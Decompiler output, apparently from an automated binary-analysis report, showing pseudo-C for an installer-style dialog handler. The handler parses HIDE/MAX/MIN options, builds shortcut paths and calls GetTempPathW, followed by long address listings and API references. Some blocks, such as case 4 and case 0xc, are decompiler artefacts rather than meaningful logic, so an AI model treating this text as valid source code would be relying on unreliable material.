												if( *(__ebp - 0x1108) != __bx) {
													__eax = __ebp - 0x1108;
													__eax = E000835B3(__ebp - 0x1108);
													_push(0x5c);
													_pop(__ecx);
													__eflags =  *((intOrPtr*)(__ebp + __eax * 2 - 0x110a)) - __cx;
													if(__eflags != 0) {
														__ebp - 0x1108 = E0006FE2E(__eflags, __ebp - 0x1108, "\\", __esi);
													}
												}
												__esi = E000835B3(__edi);
												__eax = __ebp - 0x1108;
												__eflags = __esi - 0x7ff;
												__esi = 0x800;
												if(__eflags < 0) {
													__ebp - 0x1108 = E0006FE2E(__eflags, __ebp - 0x1108, __edi, 0x800);
												}
												goto L63;
											}
											L52:
											__eflags =  *((short*)(__edi + 2)) - 0x3a;
											if( *((short*)(__edi + 2)) == 0x3a) {
												goto L62;
											}
											goto L53;
										}
										L47:
										__eflags =  *((intOrPtr*)(__edi + 2)) - __cx;
										if( *((intOrPtr*)(__edi + 2)) != __cx) {
											goto L50;
										}
										L48:
										__edi = __edi + 4;
										__ebx = 0;
										__eflags =  *__edi - __bx;
										if( *__edi == __bx) {
											goto L172;
										} else {
											__ebp - 0x1108 = E0006FE56(__ebp - 0x1108, __edi, 0x800);
											goto L63;
										}
									}
								case 4:
									L68:
									__eflags =  *0xaa46c - 1;
									__eflags = __eax - 0xaa46c;
									 *__edi =  *__edi + __ecx;
									__eflags =  *__edi & __cl;
									_pop(es);
									 *__eax =  *__eax + __al;
									__eflags =  *__eax;
								case 5:
									L73:
									__eax =  *(__ebp - 0x3508) & 0x0000ffff;
									__ecx = 0;
									__eax =  *(__ebp - 0x3508) & 0x0000ffff;
									__eflags = __eax;
									if(__eax == 0) {
										L80:
										 *0xa8453 = __cl;
										 *0xa8460 = 1;
										goto L172;
									}
									L74:
									__eax = __eax - 0x30;
									__eflags = __eax;
									if(__eax == 0) {
										L78:
										 *0xa8453 = __cl;
										L79:
										 *0xa8460 = __cl;
										goto L172;
									}
									L75:
									__eax = __eax - 1;
									__eflags = __eax;
									if(__eax == 0) {
										goto L80;
									}
									L76:
									__eax = __eax - 1;
									__eflags = __eax;
									if(__eax != 0) {
										goto L172;
									}
									L77:
									 *0xa8453 = 1;
									goto L79;
								case 6:
									L86:
									__edi = 0;
									 *0xbec98 = 1;
									__edi = 1;
									__ebx = __ebp - 0x3508;
									__eflags =  *(__ebp - 0x3508) - 0x3c;
									if( *(__ebp - 0x3508) != 0x3c) {
										L97:
										__eflags =  *((intOrPtr*)(__ebp + 0x10)) - 5;
										if( *((intOrPtr*)(__ebp + 0x10)) != 5) {
											L100:
											__eflags =  *((intOrPtr*)(__ebp + 0x10)) - 4;
											if( *((intOrPtr*)(__ebp + 0x10)) == 4) {
												__eflags = __esi - 6;
												if(__esi == 6) {
													0 = E0007CE22(__ebp,  *(__ebp + 8), __ebx, __edi, 0);
												}
											}
											goto L172;
										}
										L98:
										__eflags = __esi - 9;
										if(__esi != 9) {
											goto L172;
										}
										L99:
										__eax = E0007CE22(__ebp,  *(__ebp + 8), __ebx, __edi, 1);
										goto L100;
									}
									L87:
									__eax = __ebp - 0x3506;
									_push(0x3e);
									_push(__ebp - 0x3506);
									__eax = E000815E8(__ecx);
									_pop(__ecx);
									_pop(__ecx);
									__eflags = __eax;
									if(__eax == 0) {
										goto L97;
									}
									L88:
									_t101 = __eax + 2; // 0x2
									__ecx = _t101;
									 *(__ebp - 0x14) = _t101;
									__ecx = 0;
									__eflags = 0;
									 *__eax = __cx;
									__eax = __ebp - 0x108;
									_push(0x64);
									_push(__ebp - 0x108);
									__eax = __ebp - 0x3506;
									_push(__ebp - 0x3506);
									while(1) {
										L89:
										__ebx = E0007A6C7();
										__eflags = __ebx;
										if(__ebx == 0) {
											break;
										}
										L90:
										__eflags =  *(__ebp - 0x108);
										if( *(__ebp - 0x108) == 0) {
											break;
										}
										L91:
										__eax = __ebp - 0x108;
										__eax = E000717AC(__ebp - 0x108, L"HIDE");
										__eax =  ~__eax;
										asm("sbb eax, eax");
										__edi = __edi & __eax;
										__eax = __ebp - 0x108;
										__eax = E000717AC(__ebp - 0x108, L"MAX");
										__eflags = __eax;
										if(__eax == 0) {
											_push(3);
											_pop(__edi);
										}
										__eax = __ebp - 0x108;
										__eax = E000717AC(__ebp - 0x108, L"MIN");
										__eflags = __eax;
										if(__eax == 0) {
											_push(6);
											_pop(__edi);
										}
										_push(0x64);
										__eax = __ebp - 0x108;
										_push(__ebp - 0x108);
										_push(__ebx);
									}
									L96:
									__ebx =  *(__ebp - 0x14);
									goto L97;
								case 7:
									goto L0;
								case 8:
									L126:
									__eflags = __ebx - 3;
									if(__ebx == 3) {
										__eflags =  *(__ebp - 0x3508) - __di;
										if(__eflags != 0) {
											__eax = __ebp - 0x3508;
											_push(__ebp - 0x3508);
											__eax = E00087107(__ebx, __edi);
											_pop(__ecx);
											 *0xbec94 = __eax;
										}
										__eax = __ebp + 0xc;
										_push(__ebp + 0xc);
										 *0xbec90 = E0007AB9A(__ecx, __edx, __eflags);
									}
									 *0xb6b7b = 1;
									goto L172;
								case 9:
									L131:
									__eflags = __ebx - 6;
									if(__ebx != 6) {
										goto L172;
									}
									L132:
									__eax = 0;
									 *(__ebp - 0x4d08) = __ax;
									__eax =  *(__ebp - 0x1bd58) & 0x0000ffff;
									__eax = E00086420( *(__ebp - 0x1bd58) & 0x0000ffff);
									_push(0x800);
									__eflags = __eax - 0x50;
									if(__eax == 0x50) {
										_push(0xbbb82);
										__eax = __ebp - 0x4d08;
										_push(__ebp - 0x4d08);
										__eax = E0006FE56();
										 *(__ebp - 0x14) = 2;
									} else {
										__eflags = __eax - 0x54;
										__eax = __ebp - 0x4d08;
										if(__eflags == 0) {
											_push(0xbab82);
											_push(__eax);
											__eax = E0006FE56();
											 *(__ebp - 0x14) = 7;
										} else {
											_push(0xbcb82);
											_push(__eax);
											__eax = E0006FE56();
											 *(__ebp - 0x14) = 0x10;
										}
									}
									__eax = 0;
									 *(__ebp - 0x9d58) = __ax;
									 *(__ebp - 0x3d08) = __ax;
									__ebp - 0x19d58 = __ebp - 0x6d50;
									__eax = E000857E6(__ebp - 0x6d50, __ebp - 0x19d58);
									_pop(__ecx);
									_pop(__ecx);
									_push(0x22);
									_pop(__ebx);
									__eflags =  *(__ebp - 0x6d50) - __bx;
									if( *(__ebp - 0x6d50) != __bx) {
										L140:
										__ebp - 0x6d50 = E0006A180(__ebp - 0x6d50);
										__eflags = __al;
										if(__al != 0) {
											goto L157;
										}
										L141:
										__ebx = __edi;
										__esi = __ebp - 0x6d50;
										__eflags =  *(__ebp - 0x6d50) - __bx;
										if( *(__ebp - 0x6d50) == __bx) {
											goto L157;
										}
										L142:
										_push(0x20);
										_pop(__ecx);
										do {
											L143:
											__eax = __esi->i & 0x0000ffff;
											__eflags = __ax - __cx;
											if(__ax == __cx) {
												L145:
												__edi = __eax;
												__eax = 0;
												__esi->i = __ax;
												__ebp - 0x6d50 = E0006A180(__ebp - 0x6d50);
												__eflags = __al;
												if(__al == 0) {
													L152:
													__esi->i = __di;
													L153:
													_push(0x20);
													_pop(__ecx);
													__edi = 0;
													__eflags = 0;
													goto L154;
												}
												L146:
												_push(0x2f);
												_pop(__eax);
												__ebx = __esi;
												__eflags = __di - __ax;
												if(__di != __ax) {
													L148:
													_push(0x20);
													_pop(__eax);
													do {
														L149:
														__esi =  &(__esi->i);
														__eflags = __esi->i - __ax;
													} while (__esi->i == __ax);
													_push(__esi);
													__eax = __ebp - 0x3d08;
													L151:
													_push(__eax);
													__eax = E000857E6();
													_pop(__ecx);
													_pop(__ecx);
													 *__ebx = __di;
													goto L153;
												}
												L147:
												 *(__ebp - 0x3d08) = __ax;
												__eax =  &(__esi->i);
												_push( &(__esi->i));
												__eax = __ebp - 0x3d06;
												goto L151;
											}
											L144:
											_push(0x2f);
											_pop(__edx);
											__eflags = __ax - __dx;
											if(__ax != __dx) {
												goto L154;
											}
											goto L145;
											L154:
											__esi =  &(__esi->i);
											__eflags = __esi->i - __di;
										} while (__esi->i != __di);
										__eflags = __ebx;
										if(__ebx != 0) {
											__eax = 0;
											__eflags = 0;
											 *__ebx = __ax;
										}
										goto L157;
									} else {
										L138:
										__ebp - 0x19d56 = __ebp - 0x6d50;
										E000857E6(__ebp - 0x6d50, __ebp - 0x19d56) = __ebp - 0x6d4e;
										_push(__ebx);
										_push(__ebp - 0x6d4e);
										__eax = E000815E8(__ecx);
										__esp = __esp + 0x10;
										__eflags = __eax;
										if(__eax != 0) {
											__ecx = 0;
											 *__eax = __cx;
											__ebp - 0x3d08 = E000857E6(__ebp - 0x3d08, __ebp - 0x3d08);
											_pop(__ecx);
											_pop(__ecx);
										}
										L157:
										__eflags =  *((short*)(__ebp - 0x11d58));
										__ebx = 0x800;
										if( *((short*)(__ebp - 0x11d58)) != 0) {
											__ebp - 0x9d58 = __ebp - 0x11d58;
											__eax = E0006B239(__ebp - 0x11d58, __ebp - 0x9d58, 0x800);
										}
										__ebp - 0xbd58 = __ebp - 0x6d50;
										__eax = E0006B239(__ebp - 0x6d50, __ebp - 0xbd58, __ebx);
										__eflags =  *(__ebp - 0x4d08);
										if(__eflags == 0) {
											__ebp - 0x4d08 = E0007AB2E(__ecx, __ebp - 0x4d08,  *(__ebp - 0x14));
										}
										__ebp - 0x4d08 = E0006B207(__eflags, __ebp - 0x4d08, __ebx);
										__eflags =  *((short*)(__ebp - 0x17d58));
										if(__eflags != 0) {
											__ebp - 0x17d58 = __ebp - 0x4d08;
											E0006FE2E(__eflags, __ebp - 0x4d08, __ebp - 0x17d58, __ebx) = __ebp - 0x4d08;
											__eax = E0006B207(__eflags, __ebp - 0x4d08, __ebx);
										}
										__ebp - 0x4d08 = __ebp - 0xcd58;
										__eax = E000857E6(__ebp - 0xcd58, __ebp - 0x4d08);
										__eflags =  *(__ebp - 0x13d58);
										__eax = __ebp - 0x13d58;
										_pop(__ecx);
										_pop(__ecx);
										if(__eflags == 0) {
											__eax = __ebp - 0x19d58;
										}
										__ebp - 0x4d08 = E0006FE2E(__eflags, __ebp - 0x4d08, __ebp - 0x4d08, __ebx);
										__eax = __ebp - 0x4d08;
										__eflags = E0006B493(__ebp - 0x4d08);
										if(__eflags == 0) {
											L167:
											__ebp - 0x4d08 = E0006FE2E(__eflags, __ebp - 0x4d08, L".lnk", __ebx);
											goto L168;
										} else {
											L166:
											__eflags = __eax;
											if(__eflags == 0) {
												L168:
												_push(1);
												__eax = __ebp - 0x4d08;
												_push(__ebp - 0x4d08);
												E0006A04F(__ecx, __ebp) = __ebp - 0xbd58;
												__ebp - 0xad58 = E000857E6(__ebp - 0xad58, __ebp - 0xbd58);
												_pop(__ecx);
												_pop(__ecx);
												__ebp - 0xad58 = E0006BCCF(__eflags, __ebp - 0xad58);
												__ecx =  *(__ebp - 0x3d08) & 0x0000ffff;
												__eax = __ebp - 0x3d08;
												__ecx =  ~( *(__ebp - 0x3d08) & 0x0000ffff);
												__edx = __ebp - 0x9d58;
												__esi = __ebp - 0xad58;
												asm("sbb ecx, ecx");
												__ecx =  ~( *(__ebp - 0x3d08) & 0x0000ffff) & __ebp - 0x00003d08;
												 *(__ebp - 0x9d58) & 0x0000ffff =  ~( *(__ebp - 0x9d58) & 0x0000ffff);
												asm("sbb eax, eax");
												__eax =  ~( *(__ebp - 0x9d58) & 0x0000ffff) & __ebp - 0x00009d58;
												 *(__ebp - 0xad58) & 0x0000ffff =  ~( *(__ebp - 0xad58) & 0x0000ffff);
												__eax = __ebp - 0x15d58;
												asm("sbb edx, edx");
												__edx =  ~( *(__ebp - 0xad58) & 0x0000ffff) & __esi;
												E0007A5E4(__ebp - 0x15d58) = __ebp - 0x4d08;
												__ebp - 0xbd58 = E00079BDC(__ecx, __edi, __ebp - 0xbd58, __ebp - 0x4d08,  ~( *(__ebp - 0xad58) & 0x0000ffff) & __esi, __ebp - 0xbd58,  ~( *(__ebp - 0x9d58) & 0x0000ffff) & __ebp - 0x00009d58,  ~( *(__ebp - 0x3d08) & 0x0000ffff) & __ebp - 0x00003d08);
												__eflags =  *(__ebp - 0xcd58);
												if( *(__ebp - 0xcd58) != 0) {
													_push(__edi);
													__eax = __ebp - 0xcd58;
													_push(__ebp - 0xcd58);
													_push(5);
													_push(0x1000);
													__eax =  *0xc2078();
												}
												goto L172;
											}
											goto L167;
										}
									}
								case 0xa:
									L170:
									__eflags = __ebx - 7;
									if(__ebx == 7) {
										 *0xaa470 = 1;
									}
									goto L172;
								case 0xb:
									L81:
									__eax =  *(__ebp - 0x3508) & 0x0000ffff;
									__eax = E00086420( *(__ebp - 0x3508) & 0x0000ffff);
									__eflags = __eax - 0x46;
									if(__eax == 0x46) {
										 *0xa8461 = 1;
									} else {
										__eflags = __eax - 0x55;
										if(__eax == 0x55) {
											 *0xa8462 = 1;
										} else {
											__eax = 0;
											 *0xa8461 = __al;
											 *0xa8462 = __al;
										}
									}
									goto L172;
								case 0xc:
									L103:
									 *0xbec99 = 1;
									__eax = __eax + 0xbec99;
									_t115 = __esi + 0x39;
									 *_t115 =  *(__esi + 0x39) + __esp;
									__eflags =  *_t115;
									__ebp = 0xffffcaf8;
									if( *_t115 != 0) {
										_t117 = __ebp - 0x3508; // 0xffff95f0
										__eax = _t117;
										_push(_t117);
										 *0x9e5fc = E00071798();
									}
									goto L172;
							}
							L2:
							_push(0x1000);
							_push(_t289);
							_push(_t221);
							_t221 = E0007A6C7();
							_t289 = _t289 + 0x2000;
							_t286 = _t286 - 1;
							if(_t286 != 0) {
								goto L2;
							} else {
								_t290 = _t286;
								goto L4;
							}
						}
						L173:
						 *[fs:0x0] =  *((intOrPtr*)(_t294 - 0xc));
						return _t220;
					}
					L110:
					__eflags =  *0xb6b7a;
					if( *0xb6b7a != 0) {
						goto L172;
					}
					L111:
					__eax = 0;
					 *(__ebp - 0x1508) = __ax;
					__eax = __ebp - 0x3508;
					_push(__ebp - 0x3508);
					__eax = E000815E8(__ecx);
					_pop(__ecx);
					__ecx = 0x2c;
					__eflags = __eax;
					if(__eax != 0) {
						L118:
						__eflags =  *(__ebp - 0x1508);
						if( *(__ebp - 0x1508) == 0) {
							__ebp - 0x1bd58 = __ebp - 0x3508;
							E0006FE56(__ebp - 0x3508, __ebp - 0x1bd58, 0x1000) = __ebp - 0x19d58;
							__ebp - 0x1508 = E0006FE56(__ebp - 0x1508, __ebp - 0x19d58, 0x200);
						}
						__ebp - 0x3508 = E0007A4F2(__ebp - 0x3508);
						__eax = 0;
						 *(__ebp - 0x2508) = __ax;
						__ebp - 0x1508 = __ebp - 0x3508;
						__eax = E00079F35( *(__ebp + 8), __ebp - 0x3508, __ebp - 0x1508, 0x24);
						__eflags = __eax - 6;
						if(__eax == 6) {
							goto L172;
						} else {
							L121:
							__eax = 0;
							__eflags = 0;
							 *0xa8450 = 1;
							 *0xa946a = __ax;
							__eax = EndDialog( *(__ebp + 8), 1);
							goto L122;
						}
					}
					L112:
					__esi = 0;
					__eflags =  *(__ebp - 0x3508) - __dx;
					if( *(__ebp - 0x3508) == __dx) {
						goto L118;
					}
					L113:
					__ecx = 0;
					__eax = __ebp - 0x3508;
					while(1) {
						L114:
						__eflags =  *__eax - 0x40;
						if( *__eax == 0x40) {
							break;
						}
						L115:
						__esi =  &(__esi->i);
						__eax = __ebp - 0x3508;
						__ecx = __esi + __esi;
						__eax = __ebp - 0x3508 + __ecx;
						__eflags =  *__eax - __dx;
						if( *__eax != __dx) {
							continue;
						}
						L116:
						goto L118;
					}
					L117:
					__ebp - 0x3506 = __ebp - 0x3506 + __ecx;
					__ebp - 0x1508 = E0006FE56(__ebp - 0x1508, __ebp - 0x3506 + __ecx, 0x200);
					__eax = 0;
					__eflags = 0;
					 *(__ebp + __esi * 2 - 0x3508) = __ax;
					goto L118;
					L122:
					__eflags = _t272 - 7;
					if(_t272 == 7) {
						__eflags =  *0xaa46c;
						if( *0xaa46c == 0) {
							 *0xaa46c = 2;
						}
						 *0xa9468 = 1;
					}
					goto L172;
				}
			}

0x0007c534
0x0007c534
0x0007c534
0x0007c534
0x0007c537
0x00000000
0x00000000
0x0007c53d
0x0007c53d
0x0007c543
0x0007c551
0x0007c55d
0x0007c55f
0x0007c561
0x0007c566
0x0007c566
0x0007c566
0x0007c57e
0x0007c58b
0x0007c590
0x0007c592
0x00000000
0x00000000
0x0007c564
0x0007c564
0x0007c564
0x0007c565
0x0007c565
0x0007c594
0x0007c59e
0x0007c5a4
0x0007c5ac
0x0007ca5c
0x0007ca5c
0x0007ca5c
0x0007ca61
0x0007ca65
0x0007ca69
0x0007ca70
0x0007ca77
0x0007ca7a
0x0007ca7f
0x0007ca82
0x0007ca87
0x0007be4b
0x0007be51
0x0007be57
0x0007be57
0x00000000
0x00000000
0x00000000
0x00000000
0x0007be71
0x0007be88
0x0007be8c
0x00000000
0x0007be8e
0x00000000
0x0007be8e
0x0007be8c
0x0007be93
0x0007be96
0x00000000
0x00000000
0x0007be9c
0x0007be9c
0x00000000
0x0007bea3
0x0007bea3
0x0007bea6
0x0007beb9
0x0007bedf
0x0007bef3
0x0007bef6
0x0007bf01
0x0007c045
0x0007c045
0x0007c045
0x0007c04d
0x0007c053
0x0007c058
0x0007c05a
0x00000000
0x00000000
0x0007bf0b
0x0007bf13
0x0007bf19
0x0007bf1f
0x0007bfc5
0x0007bfcc
0x0007bfd2
0x0007bfd5
0x00000000
0x00000000
0x0007bfd7
0x0007bfde
0x0007bfe4
0x0007bfe6
0x00000000
0x0007bfe8
0x0007bfe8
0x0007bfea
0x0007bfeb
0x0007bfef
0x0007c003
0x0007c008
0x0007c012
0x0007c018
0x0007c01b
0x0007bfed
0x0007bfed
0x0007bfee
0x00000000
0x0007c01d
0x0007c02b
0x0007c031
0x0007c033
0x0007c03f
0x0007c03f
0x00000000
0x0007c033
0x0007c01b
0x0007bfe6
0x0007bf25
0x0007bf34
0x0007bf41
0x0007bf52
0x0007bf55
0x0007bf58
0x0007bf6b
0x0007bf72
0x0007bf77
0x0007bf79
0x00000000
0x00000000
0x0007bf7f
0x0007bf86
0x0007bf8b
0x0007bf90
0x0007bf9c
0x0007bfa1
0x0007bfa4
0x0007bfab
0x0007bfad
0x0007bfae
0x0007bfb8
0x0007bfbe
0x0007bfbf
0x00000000
0x0007bfbf
0x0007bf5a
0x0007bf61
0x0007bf67
0x0007bf69
0x00000000
0x00000000
0x00000000
0x0007bf69
0x0007c060
0x0007c060
0x0007c06a
0x0007c06a
0x00000000
0x00000000
0x0007c074
0x0007c074
0x0007c076
0x0007c0c9
0x0007c0ce
0x0007c0d7
0x0007c0d8
0x0007c0de
0x0007c0e3
0x0007c0e6
0x0007c0e8
0x0007c0fa
0x0007c0ff
0x0007c100
0x0007c100
0x0007c101
0x0007c103
0x0007c10a
0x0007c10f
0x0007c103
0x00000000
0x00000000
0x0007c115
0x0007c115
0x0007c117
0x0007c127
0x0007c127
0x00000000
0x00000000
0x0007c132
0x0007c132
0x0007c134
0x00000000
0x00000000
0x0007c13a
0x0007c13a
0x0007c141
0x00000000
0x00000000
0x0007c147
0x0007c147
0x0007c149
0x0007c14f
0x0007c151
0x0007c158
0x0007c159
0x0007c160
0x0007c162
0x0007c162
0x0007c169
0x0007c16e
0x0007c174
0x0007c176
0x00000000
0x0007c17c
0x0007c17c
0x0007c17c
0x0007c17f
0x0007c181
0x0007c182
0x0007c185
0x0007c1ae
0x0007c1ae
0x0007c1b1
0x0007c296
0x0007c29f
0x0007c2a4
0x0007c2a4
0x0007c2a6
0x0007c2a6
0x0007c2a8
0x0007c2aa
0x0007c2b1
0x0007c2b6
0x0007c2b7
0x0007c2b8
0x0007c2ba
0x0007c2bc
0x0007c2c0
0x0007c2c2
0x0007c2c2
0x0007c2c4
0x0007c2c4
0x0007c2c0
0x0007c2c8
0x0007c2ce
0x0007c2db
0x0007c2e2
0x0007c2f2
0x0007c2fc
0x0007c30a
0x0007c310
0x0007c318
0x0007c31d
0x0007c31e
0x0007c31f
0x0007c321
0x0007c335
0x0007c335
0x00000000
0x0007c321
0x0007c1b7
0x0007c1b7
0x0007c1ba
0x0007c1c7
0x0007c1c7
0x0007c1ca
0x0007c1cc
0x0007c1cd
0x0007c1cf
0x0007c1d0
0x0007c1d5
0x0007c1da
0x0007c1e0
0x0007c1e2
0x0007c1e4
0x0007c1e7
0x0007c1ee
0x0007c1ef
0x0007c1f5
0x0007c1f6
0x0007c1f9
0x0007c1fa
0x0007c1fb
0x0007c200
0x0007c203
0x0007c209
0x0007c212
0x0007c215
0x0007c21a
0x0007c21c
0x0007c21e
0x0007c220
0x0007c220
0x0007c222
0x0007c222
0x0007c224
0x0007c224
0x0007c22c
0x0007c233
0x0007c235
0x0007c23c
0x0007c242
0x0007c244
0x0007c245
0x0007c24d
0x0007c25c
0x0007c25c
0x0007c24d
0x0007c267
0x0007c269
0x0007c278
0x0007c27e
0x0007c284
0x0007c28f
0x0007c28f
0x00000000
0x0007c284
0x0007c1bc
0x0007c1bc
0x0007c1c1
0x00000000
0x00000000
0x00000000
0x0007c1c1
0x0007c187
0x0007c187
0x0007c18b
0x00000000
0x00000000
0x0007c18d
0x0007c18d
0x0007c190
0x0007c192
0x0007c195
0x00000000
0x0007c19b
0x0007c1a4
0x00000000
0x0007c1a4
0x0007c195
0x00000000
0x0007c340
0x0007c340
0x0007c341
0x0007c346
0x0007c348
0x0007c34a
0x0007c34b
0x0007c34b
0x00000000
0x0007c381
0x0007c381
0x0007c388
0x0007c38a
0x0007c38a
0x0007c38c
0x0007c3bb
0x0007c3bb
0x0007c3c1
0x00000000
0x0007c3c1
0x0007c38e
0x0007c38e
0x0007c38e
0x0007c391
0x0007c3aa
0x0007c3aa
0x0007c3b0
0x0007c3b0
0x00000000
0x0007c3b0
0x0007c393
0x0007c393
0x0007c393
0x0007c396
0x00000000
0x00000000
0x0007c398
0x0007c398
0x0007c398
0x0007c39b
0x00000000
0x00000000
0x0007c3a1
0x0007c3a1
0x00000000
0x00000000
0x0007c40e
0x0007c40e
0x0007c410
0x0007c417
0x0007c418
0x0007c41e
0x0007c426
0x0007c4ca
0x0007c4ca
0x0007c4ce
0x0007c4e5
0x0007c4e5
0x0007c4e9
0x0007c4ef
0x0007c4f2
0x0007c500
0x0007c500
0x0007c4f2
0x00000000
0x0007c4e9
0x0007c4d0
0x0007c4d0
0x0007c4d3
0x00000000
0x00000000
0x0007c4d9
0x0007c4e0
0x00000000
0x0007c4e0
0x0007c42c
0x0007c42c
0x0007c432
0x0007c434
0x0007c435
0x0007c43a
0x0007c43b
0x0007c43c
0x0007c43e
0x00000000
0x00000000
0x0007c444
0x0007c444
0x0007c444
0x0007c447
0x0007c44a
0x0007c44a
0x0007c44c
0x0007c44f
0x0007c455
0x0007c457
0x0007c458
0x0007c45e
0x0007c45f
0x0007c45f
0x0007c464
0x0007c466
0x0007c468
0x00000000
0x00000000
0x0007c46a
0x0007c46a
0x0007c472
0x00000000
0x00000000
0x0007c474
0x0007c479
0x0007c480
0x0007c485
0x0007c48c
0x0007c48e
0x0007c490
0x0007c497
0x0007c49c
0x0007c49e
0x0007c4a0
0x0007c4a2
0x0007c4a2
0x0007c4a8
0x0007c4af
0x0007c4b4
0x0007c4b6
0x0007c4b8
0x0007c4ba
0x0007c4ba
0x0007c4bb
0x0007c4bd
0x0007c4c3
0x0007c4c4
0x0007c4c4
0x0007c4c7
0x0007c4c7
0x00000000
0x00000000
0x00000000
0x00000000
0x0007c6e0
0x0007c6e0
0x0007c6e3
0x0007c6e5
0x0007c6ec
0x0007c6ee
0x0007c6f4
0x0007c6f5
0x0007c6fa
0x0007c6fb
0x0007c6fb
0x0007c700
0x0007c703
0x0007c709
0x0007c709
0x0007c70e
0x00000000
0x00000000
0x0007c71a
0x0007c71a
0x0007c71d
0x00000000
0x00000000
0x0007c723
0x0007c723
0x0007c725
0x0007c72c
0x0007c734
0x0007c73a
0x0007c73f
0x0007c742
0x0007c777
0x0007c77c
0x0007c782
0x0007c783
0x0007c788
0x0007c744
0x0007c744
0x0007c747
0x0007c74d
0x0007c763
0x0007c768
0x0007c769
0x0007c76e
0x0007c74f
0x0007c74f
0x0007c754
0x0007c755
0x0007c75a
0x0007c75a
0x0007c74d
0x0007c78f
0x0007c791
0x0007c798
0x0007c7a6
0x0007c7ad
0x0007c7b2
0x0007c7b3
0x0007c7b4
0x0007c7b6
0x0007c7b7
0x0007c7be
0x0007c807
0x0007c80e
0x0007c813
0x0007c815
0x00000000
0x00000000
0x0007c81b
0x0007c81b
0x0007c81d
0x0007c823
0x0007c82a
0x00000000
0x00000000
0x0007c82c
0x0007c82c
0x0007c82e
0x0007c82f
0x0007c82f
0x0007c82f
0x0007c832
0x0007c835
0x0007c83f
0x0007c83f
0x0007c841
0x0007c843
0x0007c84d
0x0007c852
0x0007c854
0x0007c892
0x0007c892
0x0007c895
0x0007c895
0x0007c897
0x0007c898
0x0007c898
0x00000000
0x0007c898
0x0007c856
0x0007c856
0x0007c858
0x0007c859
0x0007c85b
0x0007c85e
0x0007c873
0x0007c873
0x0007c875
0x0007c876
0x0007c876
0x0007c876
0x0007c879
0x0007c879
0x0007c87e
0x0007c87f
0x0007c885
0x0007c885
0x0007c886
0x0007c88b
0x0007c88c
0x0007c88d
0x00000000
0x0007c88d
0x0007c860
0x0007c860
0x0007c867
0x0007c86a
0x0007c86b
0x00000000
0x0007c86b
0x0007c837
0x0007c837
0x0007c839
0x0007c83a
0x0007c83d
0x00000000
0x00000000
0x00000000
0x0007c89a
0x0007c89a
0x0007c89d
0x0007c89d
0x0007c8a2
0x0007c8a4
0x0007c8a6
0x0007c8a6
0x0007c8a8
0x0007c8a8
0x00000000
0x0007c7c0
0x0007c7c0
0x0007c7c7
0x0007c7d3
0x0007c7d9
0x0007c7da
0x0007c7db
0x0007c7e0
0x0007c7e3
0x0007c7e5
0x0007c7eb
0x0007c7ed
0x0007c7fb
0x0007c800
0x0007c801
0x0007c801
0x0007c8ab
0x0007c8ab
0x0007c8b3
0x0007c8b8
0x0007c8c2
0x0007c8c9
0x0007c8c9
0x0007c8d6
0x0007c8dd
0x0007c8e2
0x0007c8ea
0x0007c8f6
0x0007c8f6
0x0007c903
0x0007c908
0x0007c910
0x0007c91a
0x0007c927
0x0007c92e
0x0007c92e
0x0007c93a
0x0007c941
0x0007c946
0x0007c94e
0x0007c954
0x0007c955
0x0007c956
0x0007c958
0x0007c958
0x0007c96d
0x0007c972
0x0007c97e
0x0007c980
0x0007c991
0x0007c99e
0x00000000
0x0007c982
0x0007c982
0x0007c98d
0x0007c98f
0x0007c9a3
0x0007c9a3
0x0007c9a5
0x0007c9ab
0x0007c9b1
0x0007c9bf
0x0007c9c4
0x0007c9c5
0x0007c9cd
0x0007c9d2
0x0007c9d9
0x0007c9df
0x0007c9e1
0x0007c9e7
0x0007c9ed
0x0007c9ef
0x0007c9f8
0x0007c9fb
0x0007c9fd
0x0007ca06
0x0007ca09
0x0007ca0f
0x0007ca12
0x0007ca1b
0x0007ca2a
0x0007ca2f
0x0007ca37
0x0007ca39
0x0007ca3a
0x0007ca40
0x0007ca41
0x0007ca43
0x0007ca48
0x0007ca48
0x00000000
0x0007ca37
0x00000000
0x0007c98f
0x0007c980
0x00000000
0x0007ca50
0x0007ca50
0x0007ca53
0x0007ca55
0x0007ca55
0x00000000
0x00000000
0x0007c3cd
0x0007c3cd
0x0007c3d5
0x0007c3db
0x0007c3de
0x0007c402
0x0007c3e0
0x0007c3e0
0x0007c3e3
0x0007c3f6
0x0007c3e5
0x0007c3e5
0x0007c3e7
0x0007c3ec
0x0007c3ec
0x0007c3e3
0x00000000
0x00000000
0x0007c50a
0x0007c50a
0x0007c50b
0x0007c510
0x0007c510
0x0007c510
0x0007c513
0x0007c518
0x0007c51e
0x0007c51e
0x0007c524
0x0007c52a
0x0007c52a
0x00000000
0x00000000
0x0007be58
0x0007be58
0x0007be5d
0x0007be5e
0x0007be5f
0x0007be64
0x0007be6a
0x0007be6d
0x00000000
0x0007be6f
0x0007be6f
0x00000000
0x0007be6f
0x0007be6d
0x0007ca8d
0x0007ca93
0x0007ca9d
0x0007ca9d
0x0007c5b2
0x0007c5b2
0x0007c5b9
0x00000000
0x00000000
0x0007c5bf
0x0007c5bf
0x0007c5c1
0x0007c5c8
0x0007c5d0
0x0007c5d1
0x0007c5d6
0x0007c5d7
0x0007c5d8
0x0007c5da
0x0007c62e
0x0007c62e
0x0007c636
0x0007c644
0x0007c655
0x0007c663
0x0007c663
0x0007c66f
0x0007c674
0x0007c676
0x0007c686
0x0007c690
0x0007c695
0x0007c698
0x00000000
0x0007c69e
0x0007c69e
0x0007c6a3
0x0007c6a3
0x0007c6a5
0x0007c6ac
0x0007c6b2
0x00000000
0x0007c6b2
0x0007c698
0x0007c5dc
0x0007c5de
0x0007c5e0
0x0007c5e7
0x00000000
0x00000000
0x0007c5e9
0x0007c5e9
0x0007c5eb
0x0007c5f1
0x0007c5f1
0x0007c5f1
0x0007c5f5
0x00000000
0x00000000
0x0007c5f7
0x0007c5f7
0x0007c5f8
0x0007c5fe
0x0007c601
0x0007c603
0x0007c606
0x00000000
0x00000000
0x0007c608
0x00000000
0x0007c608
0x0007c60a
0x0007c615
0x0007c61f
0x0007c624
0x0007c624
0x0007c626
0x00000000
0x0007c6b8
0x0007c6b8
0x0007c6bb
0x0007c6c1
0x0007c6c8
0x0007c6ca
0x0007c6ca
0x0007c6d4
0x0007c6d4
0x00000000
0x0007c6bb

APIs

GetTempPathW.KERNEL32(00000800,?), ref: 0007C54A
_swprintf.LIBCMT ref: 0007C57E

Part of subcall function 0006400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0006401D

SetDlgItemTextW.USER32(?,00000066,000A946A), ref: 0007C59E
